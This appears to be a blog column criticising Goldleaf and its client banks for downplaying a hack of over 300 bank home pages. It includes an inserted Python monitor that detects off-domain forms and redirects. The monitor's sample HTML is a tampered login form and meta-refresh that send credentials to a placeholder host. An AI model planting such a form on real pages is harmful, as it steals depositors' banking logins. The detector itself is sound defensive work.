The mainstream press is beginning to pick up on a major breach to the banking system that has so far gone under-reported. Fellow blogger George Ou and I gave the story the attention it deserved:
- George Ou: 300+ Bank homepages hacked and redirected!
- David Berlind: Massive, under-reported online banking breach raises serious disclosure and remedy questions.
Now, some local papers in communities whose banks were affected are reporting the story. But judging by the coverage, the organizations that are best served by downplaying the problem -- the banks and the breached service provider they depend on for home page services (GoldLeaf) -- are doing a good job controlling the message. In his story in the Lincoln, Nebraska-based Lincoln Journal Star, Richard Piersol does a great job reporting on the situation. He quotes ZDNet and I want to thank him for the pointers and for giving the attention to the disclosure issue that he did. Too bad more papers, including some national ones, haven't picked up on the need to do this. Had I, as someone with a trained eye for technical BS, been a fly on the wall with Piersol as he interviewed various sources for his stories, there are a few opportunities that I might have seized like a pitbull.
Piersol reports that there's some debate as to whether the intrusion in question meets the definition of phishing. Wrote Piersol:
It's sort of like "phishing," the use of a falsely familiar front, usually using email, to get unwitting people to hand over valuable information. There is some debate about whether this incident met the "phishing" definition, because it was an invasion of servers, rather than an email enticement.
There's actually no debate as to whether this incident involved phishing or not. As in "fishing for clues," phishing involves hackers who cast their line, hook, and bait into a pool of email recipients with a bogus message indicating that some action on their account is required. In contrast, the Goldleaf intrusion involved the hacking of bank home pages that bank customers were visiting of their own volition. No one tricked them into trying to do their online banking. With phishing, there are best practices that all Internet e-mail users should follow to avoid becoming victims. With hacks of supposedly legitimate home pages, there are none.
In characterizing the odds that someone passed their online banking credentials to the hackers, Piersol quotes Goldleaf spokesman Scott Meyeroff as saying "My guess is someone out there, someone did it, even though they're told not to." Told not to do what? Under what circumstances would most depositors (some techies might be able to spot suspicious activity) visit a bank's home page of their own volition and not follow whatever process that home page sends them to? Bear in mind that the fix for some banks, as of my last report, was to send depositors to a URL that was outside the banks' domains.
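Since depositors have no way to tell a legitimately served home page from a tampered one, the check has to happen on the operator's side. As an added example that is not part of the original post or of any Goldleaf or bank code, here is a small monitor that scans a fetched home page for the kind of tampering described above: login forms, scripts, iframes or meta-refresh redirects that send the visitor or their credentials to a host outside the bank's own domain. The hostnames and the sample page are constructed placeholders (the `.invalid` TLD is reserved and never resolves).

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a bank home page whose login form and a meta refresh
# have been altered to point off the bank's own domain (placeholder hosts).
SAMPLE_HTML = """
<html><head>
<meta http-equiv="refresh" content="0;url=http://login-example.invalid/bank">
<script src="/js/site.js"></script>
</head><body>
<form action="http://login-example.invalid/creds" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<a href="/accounts">Accounts</a>
<a href="https://www.fdic.gov/">FDIC</a>
</body></html>
"""


class OffDomainFinder(HTMLParser):
    """Collects tags that send the visitor or a credential to a host other
    than the expected ones. Plain <a> links are not flagged: outbound links
    are normal, but forms, scripts, iframes and redirects are not."""
    CHECKS = {"form": "action", "script": "src", "iframe": "src"}

    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url = page_url
        self.allowed = set(allowed_hosts)
        self.findings = []  # list of (kind, offending host)

    def _check(self, kind, target):
        # Resolve relative URLs against the page so "/js/site.js" stays in-domain.
        host = urlsplit(urljoin(self.page_url, target)).hostname
        if host and host not in self.allowed:
            self.findings.append((kind, host))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in self.CHECKS and a.get(self.CHECKS[tag]):
            self._check(tag, a[self.CHECKS[tag]])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            content = a.get("content") or ""
            idx = content.lower().find("url=")
            if idx >= 0:
                self._check("meta-refresh", content[idx + 4:].strip())


def find_off_domain_targets(html, page_url, allowed_hosts):
    """Return every off-domain form/script/iframe/redirect target in the page."""
    finder = OffDomainFinder(page_url, allowed_hosts)
    finder.feed(html)
    return finder.findings
```

Run against each bank's served home page on a schedule and alert on any non-empty result; a finding like `("form", "login-example.invalid")` is exactly the condition this post argues depositors cannot be expected to notice themselves.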
As in my initial coverage, this reeks of blame deflection. If it's successfully characterized as a phishing scam, then the targeted institutions can be absolved of blame since successful phishing exploits are never the fault of those institutions. Never. It's like counterfeit money. If you unknowingly take receipt of a counterfeit bill in your change at Starbucks and then try to use that bill in your next transaction, it's not the Federal Reserve's fault. Furthermore, if you're a banker in this situation and you can sneak in a comment about how users may have engaged in behavior that they shouldn't have, now you're even further distancing yourself from accountability. This isn't just lack of accountability. This is insulting to the intelligence of depositors.
Meyeroff further downplayed the nature of the incident by pointing out that the hack was "non-transactional" in nature. Backed up by quotes from banks like "there was absolutely no loss and no fraudulent activity," this comes across as though there was minimal risk. Even more worrisome is a quote from Meyeroff where he says the authorities and banking regulators "haven't reviewed this as a material incident" because of the non-transactional nature.
I'm not suggesting that Goldleaf and its customers (the banks) conspired with prepared language designed to snuff out a public relations nightmare. But Goldleaf and its banks are the ones who can least afford that nightmare. One really important job of bankers is to maintain the public's confidence in the integrity of the banking system. I've interviewed overseers of state banking systems who've told me this point blank. So, as long as they're not under oath at some hearing, should we really expect a banker to say anything that might undermine that confidence? Of course not.
It's not a "material incident?" Puh-leeze. Hackers break the home page of more than 300 banks in a way that could cause depositors to unwittingly hand their banking credentials to hackers in Madrid and the bankers and the authorities think this is non-material? What are these people smoking?
This is exactly the reason why, if there are going to be regulations regarding disclosure and remedy in compromises of anything remotely personally identified, whether transactional or not, that those regulations need the sort of teeth that force rigorous disclosure and transparent review. Anything less, and the organizations being regulated will think they can get away with murder, and will.